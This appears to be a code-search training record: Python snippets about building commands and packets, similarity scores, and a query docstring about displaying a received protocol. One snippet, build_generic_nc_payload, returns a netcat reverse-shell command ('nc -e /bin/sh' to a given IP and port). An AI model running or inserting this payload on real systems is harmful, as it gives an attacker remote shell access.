"def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)",
"def test_commandRepr(self):\n repr(imap4.Command(b\"COMMAND\", [b\"arg\"], (b'extra')))",
"def encode(self):\n packed = struct.pack(\"<2Bl\",\n self.device_number,\n self.command_number,\n self.data)\n if self.message_id is not None:\n packed = packed[:5] + struct.pack(\"B\", self.message_id)\n return packed",
"def test_build_full_command(self):\n actual_result = IperfClientCommandBuilder() \\\n .set_server_ip(SERVER_IP)\\\n .set_port('22')\\\n .set_mode_udp(IPERF_MODE)\\\n .set_time_interval(INTERVAL)\\\n .set_testing_time(TIME) \\\n .build_client_command()\n self.assertListEqual(actual_result,\n ['iperf', '-c', '192.168.1.1', '-u',\n '-p', '22', '-t', '30', '-i', '5'])",
"def create_command_from_request(request: RequestInterface):",
"def create_command(command: str, *parameters) -> str:\n if parameters and isinstance(parameters, tuple) and isinstance(parameters[0], tuple):\n parameters = parameters[0]\n str_param: str = ' '.join([str(param) for param in parameters]) if parameters else \"\"\n result = command+' ' + str_param + '\\r\\n' if str_param else command + '\\r\\n'\n return result",
"def create_packet(id, seq, data_size):\n\n # Random sequence of characters.\n payload = ''\n for k in range(data_size):\n payload += chr(random.randint(65, 65+25))\n\n # Create ICMP echo packet.\n echo = dpkt.icmp.ICMP.Echo()\n echo.id = id\n echo.seq = seq\n echo.data = payload\n\n icmp = dpkt.icmp.ICMP()\n icmp.type = dpkt.icmp.ICMP_ECHO\n icmp.data = echo\n\n # Return data packet as string representation.\n packet = str(icmp)\n\n # Done.\n return (payload, packet)",
"def _get_cmd(cls, command, f_config, verbose=False):\n if command not in cls.COMMANDS:\n raise KeyError('Could not recongize command \"{}\". '\n 'Available commands are: {}'\n .format(command, cls.COMMANDS))\n cmd = cls.CMD_BASE.format(fp_config=f_config, command=command)\n if verbose:\n cmd += ' -v'\n\n return cmd",
"def serialize(self):\n\n # The len must be multiple of 4 bits to convert unambiguously\n\n id_len = self.id.bit_length()\n while (id_len % 4)!= 0:\n id_len += 1\n if self.payload:\n pay_len = self.payload.bit_length()\n while (pay_len % 4)!= 0:\n pay_len += 1\n else: pay_len = 0\n if self.command:\n com_len = self.command.bit_length()\n while (com_len % 4)!= 0:\n com_len += 1\n else: com_len = 0\n\n values = {\n \"id\": self.id,\n \"id_len\": id_len,\n \"payload\": self.payload,\n \"payload_len\": pay_len,\n \"command\": self.command,\n \"command_len\": com_len\n }\n\n\n if self.id == Message.MEASURE or self.id == Message.SINGLE_MEASURE:\n serial_format = (\n \"uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n else:\n serial_format = (\n \"0x23, uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n\n message = bitstring.pack(serial_format, **values)\n\n rospy.logdebug(\"Sent command '0x%s'\", message.hex)\n\n return message.tobytes()",
"def _packet_string(self):\n return 'Packet (Length: %s)%s' % (self.length, os.linesep)",
"def add_command(self, command, length, format_string): \n \n # see if no new commands have been added\n if self.no_commands:\n \n # empty the dictionary\n self.SCPI_Data = {} \n \n # set the updated flag\n self.no_commands = False\n # end if\n \n # check if the command is valid\n if length.isdigit() and is_valid_format(format_string):\n if int(length) > 0:\n # the command is valid so proceed\n \n # define list of keys to use\n keys = [command + ',name', command + ',data',\n command + ',length', command + ',ascii']\n \n # define list of bbyte lengths to use\n key_bytes = [# name length\n self.wflag_size + self.time_size + \\\n self.name_size + self.chksum_size,\n # data length\n self.wflag_size + self.time_size + \\\n self.chksum_size + int(length),\n # length length\n self.wflag_size + self.time_size + \\\n self.length_size + self.chksum_size,\n # ascii length\n self.wflag_size + self.time_size + \\\n self.chksum_size + self.ascii_size]\n \n # define list of formats\n formats = ['ascii', format_string, 'uint', 'ascii']\n \n # construct the four scpi commands for each command\n for i in range(0,4):\n \n # check if the command already exists in the library\n if keys[i] not in self.SCPI_Data:\n # it doesnt so add it\n self.SCPI_Data[keys[i]] = [key_bytes[i], \n formats[i]]\n \n elif (i == 0):\n self.error_log.append('*** ' + command + \n ' already in library ***') \n # end if \n # end for\n \n else:\n self.error_log.append('*** ' + command + \n ' length is too short ***') \n # end if\n \n else:\n self.error_log.append('*** ' + command + \n ' length or format is invalid ***') \n # end if",
"def _extract_command(fields: List[bytes]) -> Tuple[Any, List[Any]]:\n cmd = encode_command(fields[0])\n if cmd in COMMANDS_WITH_SUB and len(fields) >= 2:\n cmd += \" \" + encode_command(fields[1])\n cmd_arguments = fields[2:]\n else:\n cmd_arguments = fields[1:]\n return cmd, cmd_arguments",
"def buildPackets(self):\n return self.input",
"def build_generic_nc_payload(revshell_ip, revshell_port) -> str:\n return 'nc -e /bin/sh {} {}'.format(revshell_ip, revshell_port)",
"def cmd_parse(self, cmd):\n chan = (cmd & 0x200) >> 8\n val = cmd & 0xff\n return 'w'+str(chan)+'.v'+str(value)",
"def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out",
"def pack(self):\n\n msg = struct.pack(SentmanRequest.FORMAT,\n self.version, self.op_type, self.msg_len)\n return msg",
"def send_cmd(self, cmd, *args):\n self.write_pkt_line(cmd + b\" \" + b\"\".join([(a + b\"\\0\") for a in args]))",
"def translate_to_binary(command):\r\n int_command = int(command)\r\n binary_command = bin(int_command)[2:]\r\n missing_bits = CMD_LEN - len(binary_command)\r\n cmd_prefix = missing_bits * str(0)\r\n binary_command = str(cmd_prefix) + str(binary_command)\r\n return binary_command + \"\\n\"",
"def test_cmd_builder(self):\n test_conf = '/tmp/test'\n expected_cmd = ['calabar_vpnc', test_conf]\n\n cmd = self.t._build_cmd(test_conf, None)\n self.assertTrue(cmd, expected_cmd)",
"def build_irc_msg(command, params, final_param_multi_word=False,\n source=None):\n\n if final_param_multi_word:\n final_param = ':' + params[-1]\n else:\n final_param = params[-1]\n\n if source:\n prefix = ':' + source\n else:\n prefix = ''\n\n if len(params) > 1:\n parts = [prefix, command, ' '.join(params[:-1]), final_param]\n else:\n parts = [prefix, command, final_param]\n\n return ' '.join(parts).strip() + '\\r\\n'",
"def command(s_socket):\r\n command = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(command) + 5, 4, 'little')\r\n s_socket.send('c' + bytes_value + command)\r\n\r\n print(s_socket.recv(MAX_BUFFER_LENGTH))",
"def __init__(self, command: str, data, checksum: bool):\r\n self.command = command\r\n \"\"\"Command to perform\"\"\"\r\n self.checksum = checksum\r\n \"\"\"Checksum protocol mode.\"\"\"\r\n self.data = data\r\n \"\"\"Data for PWM (or SET for closed loop) command.\"\"\"",
"def build_commands(self):\n commands_dict = {}\n for k in (self.__class__.__dict__.keys() + IrcStatusBot.__dict__.keys()):\n if k.startswith('command_'):\n commands_dict[k[8:].lower()] = None\n commands = commands_dict.keys()\n commands.sort()\n return commands",
"def buildReq(cmd, target, sequence, fieldList):\n return buildCmd(\"REQ\", cmd, target, sequence, fieldList)",
"def _create_commands(self, data):\n lines = []\n idone, odone = False, False\n for line in data.split(b'\\n'):\n if line.startswith(b'@intext'):\n if self.inputastext is None:\n self.metadata['inputastext'] = True\n self.inputastext = True\n idone = True\n elif line.startswith(b'@outtext'):\n if self.outputastext is None:\n self.metadata['outputastext'] = True\n self.outputastext = True\n odone = True\n else:\n # remove eventual comment\n m = re.match(br'(.*?);', line)\n if m:\n line = m.group(1)\n line = line.rstrip()\n if line:\n lines.append(line)\n if not idone:\n if self.inputastext:\n self.metadata['inputastext'] = True\n if not odone:\n if self.outputastext:\n self.metadata['outputastext'] = True\n if not lines:\n raise CarError('no source code')\n min_indent = len(lines[0]) # temporary\n for line in lines:\n indent = len(line) - len(line.lstrip())\n if indent == 0:\n break\n if indent < min_indent:\n min_indent = indent\n else:\n lines = tuple(x[min_indent:] for x in lines)\n\n #self.raw_board = '\\n'.join(lines) # for an eventual curses simulator\n\n board = []\n has_car, has_exit = False, False\n y = 0\n for line in lines:\n row = array.array('B')\n x = 0\n for c in line:\n try:\n op = _opcode_to_const_map[c]\n except KeyError:\n op = NOP\n if op == CAR:\n if has_car:\n raise CarError('program can only have one car')\n has_car = True\n car_pos = (x, y)\n row.append(NOP)\n else:\n row.append(op)\n if op == EXIT:\n if has_exit:\n raise CarError('program can only have one exit')\n has_exit = True\n x += 1\n board.append(row)\n y += 1\n if not has_car:\n raise CarError('program must have one car')\n if not has_exit:\n raise CarError('program must have one exit')\n return self._board_to_commands(board, car_pos)",
"def __bytes__(self):\n return pack(\"<HH\", self._packet_len, self._control_ctr)",
"def build_cmd(self, cmd_list: List[Optional[str]], input_symbol: str = \"@@\") -> List[Optional[str]]:\n\n # initialize command with harness binary and DeepState flags to pass to it\n cmd_list.extend([\n \"--\", self.binary,\n \"--input_test_file\", input_symbol,\n \"--abort_on_fail\",\n \"--no_fork\",\n \"--min_log_level\", str(self.min_log_level)\n ])\n\n # append any other DeepState flags\n for key, val in self.target_args:\n if len(key) == 1:\n cmd_list.append('-{}'.format(key))\n else:\n cmd_list.append('--{}'.format(key))\n if val is not None:\n cmd_list.append(val)\n\n # test selection\n if self.which_test:\n cmd_list.extend([\"--input_which_test\", self.which_test])\n\n return cmd_list",
"def format_message(command_code, body=b''):\n return bytes([MESSAGE_START_BYTE, command_code.value]) + body",
"def _collect_command(self, command_element):\n command_name = GLGenerator.get_command_name(command_element)\n #print(f'Command: {command_name}')\n\n if command_name not in self.command_list:\n return\n\n if not self._command_should_collect(command_name):\n return\n\n func_prefix_len = len(self.func_prefix)\n\n proto_element = command_element.find('proto')\n proto_info = self._parse_node(proto_element)\n native_name = proto_info.name\n short_name = native_name[func_prefix_len:]\n wrapper_name = GLGenerator.wrapper_function_name(command_name)\n native_return_type = proto_info.native_type\n wrapper_return_type = proto_info.wrapper_type\n capture_result = ''\n native_return_statement = ''\n wrapper_return_statement = ''\n if native_return_type != 'void':\n capture_result = 'auto res = '\n native_return_statement = ' return res;\\n'\n wrapper_return_statement = f' return static_cast<{wrapper_return_type}>(res);\\n'\n\n native_params = []\n wrapper_params = []\n format_strings = []\n format_entries = []\n argument_list = []\n native_arg_type_list = []\n wrapper_arg_type_list = []\n\n for param in command_element.findall('param'):\n param_info = self._parse_node(param)\n param_name = param_info.name\n native_params.append(param_info.native_type + ' ' + param_name)\n wrapper_params.append(param_info.wrapper_type + ' ' + param_name)\n native_arg_type_list.append(param_info.native_type)\n wrapper_arg_type_list.append(param_info.wrapper_type)\n format_strings.append(param_info.format_string)\n format_entries.append(param_info.format_entry)\n if param_info.is_pointer:\n argument_list.append(f'reinterpret_cast<{param_info.native_type}>({param_name})')\n else:\n argument_list.append(f'static_cast<{param_info.native_type}>({param_name})')\n\n log_format_entries = ''\n if len(format_entries) > 0:\n separator = ',\\n '\n log_format_entries = separator + separator.join(format_entries)\n\n formatting = {\n 'COMMAND_NAME': command_name,\n 'SHORT_NAME': short_name,\n 'NATIVE_RETURN_TYPE': native_return_type.strip(),\n 'NATIVE_NAME': native_name,\n 'NATIVE_ARGUMENTS': ', '.join(native_params),\n 'NATIVE_ARG_TYPE_LIST': ', '.join(native_arg_type_list),\n 'NATIVE_RETURN_STATEMENT': native_return_statement,\n 'COMMAND_VERSION': self._command_version(command_name),\n\n 'WRAPPER_RETURN_TYPE': wrapper_return_type.strip(),\n 'WRAPPER_NAME': wrapper_name,\n 'WRAPPER_ARGUMENTS': ', '.join(wrapper_params),\n 'WRAPPER_ARG_TYPE_LIST': ', '.join(wrapper_arg_type_list),\n 'WRAPPER_RETURN_STATEMENT': wrapper_return_statement,\n\n 'LOG_FORMAT_STRING': ', '.join(format_strings),\n 'LOG_FORMAT_ENTRIES': log_format_entries,\n 'CAPTURE_RESULT': capture_result,\n 'ARGUMENT_LIST': ', '.join(argument_list),\n }\n\n wrapper_function_declaration = templates.WRAPPER_FUNCTION_DECLARATION.format(**formatting)\n self.wrapper_function_declarations.append(wrapper_function_declaration)\n\n wrapper_function_definition = templates.WRAPPER_FUNCTION_DEFINITION.format(**formatting)\n self.wrapper_function_definitions.append(wrapper_function_definition)\n\n for feature in self.command_required_by_feature.get(command_name, []):\n number = feature[\"number\"]\n self.command_info_entries += (\n f' check_version(Command::Command_{command_name}, {number});\\n'\n )\n\n for extension in self.command_required_by_extension.get(command_name, []):\n extension_name = extension[\"name\"]\n self.command_info_entries += (\n f' check_extension(Command::Command_{command_name}, '\n f'Extension::Extension_{extension_name});\\n'\n )\n\n decl_entry = templates.DYNAMIC_LOAD_FUNCTION_DECLARATION .format(**formatting)\n defn_entry = templates.DYNAMIC_LOAD_FUNCTION_DEFINITION .format(**formatting)\n get_entry = templates.DYNAMIC_LOAD_FUNCTION_GET_STATEMENT.format(**formatting)\n self.dynamic_function_declarations .append(decl_entry)\n self.dynamic_function_definitions .append(defn_entry)\n self.dynamic_function_get_statements.append(get_entry)",
"def test_build_command(self):\n actual_result = IperfServerCommandBuilder().build_server_command()\n self.assertListEqual(actual_result, ['iperf', '-s'])",
"def genCmd(self, cmdinfo, name, alias):\n OutputGenerator.genCmd(self, cmdinfo, name, alias)\n\n # Add a typeCategory{} entry for the category of this type.\n self.addName(self.typeCategory, name, 'protos')\n\n if alias:\n # Add name -> alias mapping\n self.addName(self.alias, name, alias)\n else:\n # May want to only emit definition on this branch\n True\n\n params = [param.text for param in cmdinfo.elem.findall('param/name')]\n self.protos[name] = params\n paramTypes = [param.text for param in cmdinfo.elem.findall('param/type')]\n for param_type in paramTypes:\n self.addMapping(name, param_type)",
"def create_ui_commands(pcm_speed, hud, idx):\n commands = []\n pcm_speed_real = clip(int(round(pcm_speed / 0.002759506)), 0,\n 64000) # conversion factor from dbc file\n msg_0x30c = struct.pack(\"!HBBBBB\", pcm_speed_real, hud.pcm_accel,\n hud.v_cruise, hud.X2, hud.car, hud.X4)\n commands.append(make_can_msg(0x30c, msg_0x30c, idx, 0))\n\n msg_0x33d = chr(hud.X5) + chr(hud.lanes) + chr(hud.beep) + chr(hud.X8)\n commands.append(make_can_msg(0x33d, msg_0x33d, idx, 0))\n # if car_fingerprint in (CAR.CIVIC, CAR.ODYSSEY):\n msg_0x35e = chr(0) * 7\n commands.append(make_can_msg(0x35e, msg_0x35e, idx, 0))\n msg_0x39f = (chr(0) * 2 + chr(hud.acc_alert) +\n chr(0) + chr(0xff) + chr(0x7f) + chr(0))\n commands.append(make_can_msg(0x39f, msg_0x39f, idx, 0))\n return commands",
"def create_gas_command(gas_amount, idx):\n # enable_bit = 1 << 7\n # max_gas = 176.526\n # offset = -83.3\n # scaled_offset = offset / 1023.0 * max_gas\n # offset_raw = 21\n # offset2_raw = 11\n # print(offset_raw)\n # print(scaled_offset)\n # gas_amount_ = (float(gas_amount) / 1023.0) * max_gas\n # print(gas_amount_)\n # gas_amount_2 = (float(gas_amount) / 1023.0) * max_gas / 2.0\n # gas_amount_ = gas_amount_ + offset_raw\n # print(gas_amount_)\n # gas_amount_2 = gas_amount_2 + offset2_raw\n\n # gas_amount_ = int(gas_amount_ / max_gas * 1023.0)\n # gas_amount_2 = int(gas_amount_2 / max_gas * 1023.0)\n # print(\"gas 1 gas 2\")\n # print(gas_amount_)\n # print(gas_amount_2)\n\n offset1_raw = 328 # 21\n offset2_raw = 656 # 11\n gas_amount_1 = gas_amount + offset1_raw\n gas_amount_2 = gas_amount * 2 + offset2_raw\n if gas_amount <= 0:\n enable_bit = 0\n else:\n enable_bit = 1 << 7\n\n if gas_amount <= 0:\n enable_bit = 0\n msg = struct.pack(\"!HHB\", gas_amount_1, gas_amount_2, enable_bit)\n return make_can_msg(0x200, msg, idx, 0)",
"def add_command(self, name, command):\n if command['type'] == 'topic':\n if 'deadman_buttons' not in command:\n command['deadman_buttons'] = []\n command['buttons'] = command['deadman_buttons']\n if 'deadman_axes' not in command:\n command['deadman_axes'] = []\n command['axes'] = command['deadman_axes']\n elif command['type'] == 'action':\n if 'action_goal' not in command:\n command['action_goal'] = {}\n elif command['type'] == 'service':\n if 'service_request' not in command:\n command['service_request'] = {}\n self.command_list[name] = command",
"def cmd_from_binary(binary_string):\n cmd = Command()\n if binary_string[:2] != cmd.PREAMBLE:\n raise ValueError('Invalid command preamble in: {0}'.format(binary_string))\n if binary_string[2] != cmd.CONTROLLER_ADDRESS or binary_string[3] != cmd.TRANSCEIVER_ADDRESS:\n raise ValueError('Invalid controller/transceiver addresses: {0}'.format(binary_string[2:4]))\n\n cmd.cmd_num = binary_string[4]\n\n # how will we know if there's a subcommand?",
"def makecmd(self, options):",
"def send_command_bytes_usb(self, data, response_header = False):\n checksum = 0\n\n for d in data:\n checksum += ord(d)\n\n # Construct the packet.\n # NOTE: If you want the response header use 0xf9; \n # for no response header (see below) use 0xf7\n packet = chr(0xf7)\n\n if response_header:\n packet = chr(0xf9)\n\n packet += data+chr(checksum % 256)\n self.port.write(packet.encode('latin-1'))",
"def command(self, inst_data: int, buf: bytes, /) -> None:",
"def _pack(self) -> bytes:\n\n return struct.pack(\n self.PACKAGING_FORMAT, \n self.first_operand, \n self.operator, \n self.type_of_second_operand, \n self.second_operand, \n self.length\n )",
"def create_command(self, on_or_off: bool, port: int):\n return self.power_strip.create_command(port, on_or_off)",
"def get_command(self, offset):\n cmd = struct.unpack_from('!I', self.string, offset=offset)[0]\n # if cmd not in [1,2,3,4,9]:\n # raise ValueError('Command not recognised')\n offset += struct.calcsize('!I')\n return cmd, offset",
"def buildCommand(self, kwargs):\r\n self.command = \"\"\r\n try:\r\n if not self.isEnabled():\r\n return\r\n except Exception, e:\r\n print \"<ERROR>\", e\r\n return\r\n self.command = self.app\r\n \r\n \r\n \r\n # filename should be last in the command, so iterate again\r\n for key in kwargs:\r\n if key == 'filename':\r\n if type(kwargs[key]) == str:\r\n f = kwargs[key]\r\n if os.path.exists(f):\r\n self.command += \" \" + str(f)\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File does not exist!\"\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File needs to be a string.\"",
"def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]",
"def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)",
"def parse_command(self, command):\n \n #chcek operation type\n mod_type = re.findall('.*(rotate|translate|zoom|make|time).*',command)[0]\n \n #for each operation type recover necessary parameters\n if mod_type == 'rotate':\n angle = int(re.findall('.*rotate by (\\d+).*', command)[0])\n axis = list(map(int,re.findall('.*around \\((\\d+)\\,(\\d+)\\,(\\d+).*', command)[0]))\n\n #if the rotation angle is large split it into 3 to ensure the rotation is accomplished fully\n if angle >= 180:\n new_q = self.q.create_from_axis_angle(angle/3*2*np.pi/360, axis[0], axis[1], axis[2], degrees=False)\n result = [(mod_type, new_q),(mod_type, new_q),(mod_type, new_q)]\n else:\n new_q = self.q.create_from_axis_angle(angle*2*np.pi/360, axis[0], axis[1], axis[2], degrees=False)\n result = (mod_type, new_q)\n\n elif mod_type == 'zoom':\n factor = float(re.findall('.*factor of (\\d*\\.*\\d+).*', command)[0])\n result = (mod_type, factor)\n\n elif mod_type == 'translate':\n translate = np.array(list(map(int,re.findall('.*by \\((\\-*\\d+)\\,(\\-*\\d+)\\,(\\-*\\d+).*', command)[0])))\n result = (mod_type, translate)\n\n elif mod_type == 'make':\n layer = int(re.findall('.*make layer (\\d+).*', command)[0])\n vis_status = command.split()[-1]\n if vis_status == 'invisible':\n result = ('vis', layer, False)\n else:\n result = ('vis', layer, True)\n \n elif mod_type == 'time':\n time_shift = int(re.findall('.*by (\\-*\\d+).*', command)[0])\n result = (mod_type, time_shift)\n return result"
] | [
"0.7055916",
"0.6958671",
"0.6834779",
"0.6826811",
"0.66905415",
"0.6657784",
"0.66384405",
"0.65551907",
"0.64848095",
"0.6423199",
"0.641272",
"0.6404379",
"0.63837487",
"0.6381479",
"0.6360029",
"0.6312353",
"0.62964827",
"0.62884474",
"0.6237116",
"0.61567235",
"0.6149468",
"0.61375535",
"0.6101278",
"0.6091492",
"0.6086016",
"0.6063523",
"0.6063219",
"0.6038263",
"0.60172164",
"0.60132384",
"0.60032815",
"0.6003235",
"0.59938604",
"0.5974661",
"0.59681094",
"0.5924873",
"0.5896271",
"0.588834",
"0.58534807",
"0.58478004",
"0.5821719",
"0.581133",
"0.5806045",
"0.58000106",
"0.57829636",
"0.57612365",
"0.5753075",
"0.5751063",
"0.5737051",
"0.57324404",
"0.57207197",
"0.57199407",
"0.5713278",
"0.57089746",
"0.5698666",
"0.568274",
"0.5673011",
"0.56486756",
"0.56325567",
"0.5629906",
"0.56279016",
"0.56087756",
"0.56057507",
"0.56052405",
"0.55696034",
"0.55682856",
"0.55293924",
"0.5525873",
"0.5518849",
"0.5511666",
"0.55073494",
"0.55049455",
"0.5496324",
"0.54961395",
"0.54887086",
"0.5478929",
"0.54777396",
"0.5466431",
"0.5463021",
"0.54630107",
"0.5458271",
"0.545582",
"0.5454882",
"0.54524374",
"0.5450995",
"0.54450315",
"0.5442991",
"0.5441793",
"0.5438789",
"0.54334295",
"0.5430925",
"0.54267174",
"0.5421851",
"0.5410332",
"0.54095817",
"0.54090977",
"0.5406741",
"0.540568",
"0.5405286",
"0.54029065"
] | 0.8249946 | 0 |
Show the protocol that was received. | def __show_protocol__(self, data):
t_16 = t_16_Bit_Options()
t_8 = t_8_Bit_Options()
t_var = t_8_Bit_Options()
print('Received ' + str(len(data)) + ' Bytest')
#----------------------------------------------------------------------
print('='*80)
print('Handling Protocol response: ' + hexlify(data))
#----------------------------------------------------------------------
print('='*80)
print('Overhead Bytes: ' + hexlify(data[:BP_TOOL.OVERHEAD]))
print('Number of UINT16 bitstream data = ' + str(data[BP_TOOL.UINT16S]))
print('Number of UINT8 bitstream data = ' + str(data[BP_TOOL.UINT8S]))
print('Number of var bitstream data = ' + str(data[BP_TOOL.VARS]))
print('Follow = ' + str(self.get_follow(data)))
print('Length = ' + str(self.get_length(data)))
start = self.get_follow_and_length(data)
end = start + BP_TOOL.SIZE_FOLLOW + BP_TOOL.SIZE_LEN
print('Following bytes and length = ' + hexlify(data[start:end]))
#----------------------------------------------------------------------
print('='*80)
bits = self.get_16bit_options_bits(data)
values = self.get_16bit_options(data)
options = self.get_options_requested(bits)
# Display the options if exist
if len(options):
print('UINT16 bits...... : ' + hexlify(bits))
print('UINT16 data...... : ' + hexlify(values))
print('UINT16 Num of opts ... : ' + str(len(values) // 2))
print('UINT16 options... : ' + str(options))
print('-'*80)
for x in range(len(options)):
value = (values[x*2] << 8) | (values[x*2 + 1])
opt = options[x]
t_16.set_value(opt, value)
print('Option: ' + t_16.options[opt]['name'] + ' ' + str(value))
pprint.pprint(t_16.options)
else:
print('No 16 bit options')
#----------------------------------------------------------------------
print('-'*80)
bits = self.get_8bit_options_bits(data)
values = self.get_8bit_options(data)
options = self.get_options_requested(bits)
# Display the options if exist
if len(options):
print('UINT8 bits...... : ' + hexlify(bits))
print('UINT8 data...... : ' + hexlify(values))
print('UINT8 options... : ' + str(options))
print('-'*80)
for x in range(len(options)):
value = values[x]
opt = options[x]
t_8.set_value(opt, value)
print('Option: ' + t_8.options[x]['name'] + ' ' + str(value))
pprint.pprint(t_8.options)
else:
print('No 8 bit options')
#----------------------------------------------------------------------
print('-'*80)
bits = self.get_var_options_bits(data)
values = self.get_var_options(data)
print('VARS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
# Display the options if exist
if len(values):
pprint.pprint(values)
else:
print('No var bit options')
print('VAR options... : ' + str(self.get_options_requested(bits)))
print('VARS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('-'*80) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def protocol_details(self) -> pulumi.Output['outputs.ServerProtocolDetails']:\n return pulumi.get(self, \"protocol_details\")",
"def protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"protocol\")",
"def getProtocol(self) -> str:\n ...",
"def protocol(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol_details(self) -> Optional[pulumi.Input['ServerProtocolDetailsArgs']]:\n return pulumi.get(self, \"protocol_details\")",
"def protocol_details(self) -> Optional[pulumi.Input['ServerProtocolDetailsArgs']]:\n return pulumi.get(self, \"protocol_details\")",
"def in_protocol(self) -> str:\n return pulumi.get(self, \"in_protocol\")",
"def protocol(self):\n return self._info.next # pylint: disable=E1101",
"def ProtocolInformation(self) -> _n_0_t_7[_n_0_t_6]:",
"def protocol(self):\n self._recv_protocol()\n return self._protocol",
"def protocol(self):\n ...",
"def v_protocol(self):\n return self._protocol",
"def v_protocol(self):\n return self._protocol",
"def protocol(self) -> str:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> str:\n return self.__parameters.protocol",
"def protocol(self):\n return self._protocol",
"def gotProtocol(self,p): \n p.send_hello()",
"def getProtocol(self, _):\r\n return self._protocol",
"def protocol(self):\n return helpers.get_protocol()",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def show_cdp(self):\n txt = \"\"\n for inf in self.interfaces:\n if self.interfaces[inf]['connect'] != ['none', 'none']:\n txt += \"%s interface %s connect to %s on interface %s\\n\"%(self.hostname, inf, self.interfaces[inf]['connect'][0], self.interfaces[inf]['connect'][1]) \n return txt",
"def protocol(self):\n v = uint16_packer.unpack(self[2:4])[0]\n mask = 0b111111111111\n return v & mask",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self):\n return self._host[CONF_PROTOCOL]",
"def proto(self):\n return self.sock.proto",
"def print_transferred_data(self):\n\n for protocol in self.protocols.itervalues():\n print \"Transfer to peer %d: %d bytes in %d packets\" % \\\n (protocol.peer_id, protocol.sent_bytes, protocol.sent_packets)",
"def showconnecttoapiserver():\n print('\\n{0}'.format(middleware.preference.apiServerType))",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def protocol(self) -> str:\n return __name__",
"def proxy_protocol(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"proxy_protocol\")",
"def protocol(self):\n\n raise NotImplementedError()",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def get_protocols(self):\r\n\r\n return None",
"def protocol(self) -> NetworkProtocol:\n if hasattr(self, \"_protocol\"):\n return self._protocol\n _args: list[Arg] = []\n _ctx = self._select(\"protocol\", _args)\n return _ctx.execute_sync(NetworkProtocol)",
"def Print(self, data, output=None):\n Console.ok(f\"PRINT: Using {Registry.PROTOCOL_NAME} Protocol\")\n self.protocol.Print(data, output)",
"async def status(self):\n cmd = subprocess.check_output([\"birdc\", \"show\", \"proto\"])\n for page in chat_formatting.pagify(cmd.decode(), ['\\n', ' '], shorten_by=12):\n await self.bot.say(chat_formatting.box(page))",
"def print_connection_being_established(pkt):\n print_headers(pkt, overwrite_min=0)\n print(green(\"!!!! New TCP/OpenFlow Connection being established!!\\n\"))",
"def protocol_type(self):\n return self._read(MX_PROTOCOL_TYPE)",
"def protocol(self) -> MessageProtocol:\n return self._sender.protocol",
"def protocol(self) -> Optional[pulumi.Input['TargetServerProtocol']]:\n return pulumi.get(self, \"protocol\")",
"def __str__(self):\n return self.socket.__str__()",
"def _printable(self):\n toPrint = \"Communication header. \"\n toPrint += \"Remote App ID: \" + str(self.remote_app_id) + \" \"\n toPrint += \"Remote Node: \" + str(self.remote_node) + \" \"\n toPrint += \"Remote Port: \" + str(self.remote_port) + \" \"\n\n return toPrint",
"def protocol(request):\n return request.param",
"def info(self):\n headers = self.headers and 'headers=%s' % self.headers\n body = self.body[:self.INFO_LENGTH]\n if body not in self.body:\n body = '%s...' % body\n body = body and ('body=%s' % repr(body))\n info = ', '.join(i for i in (headers, body) if i)\n return '%s frame%s' % (self.command, info and (' [%s]' % info))",
"def connectionMade(self):\n print \"connection received from\", self.addr",
"def print_srv(msg):\n\tprint \"Server:\", \" >> \", msg",
"def __str__(self):\n return describe_connection(self)",
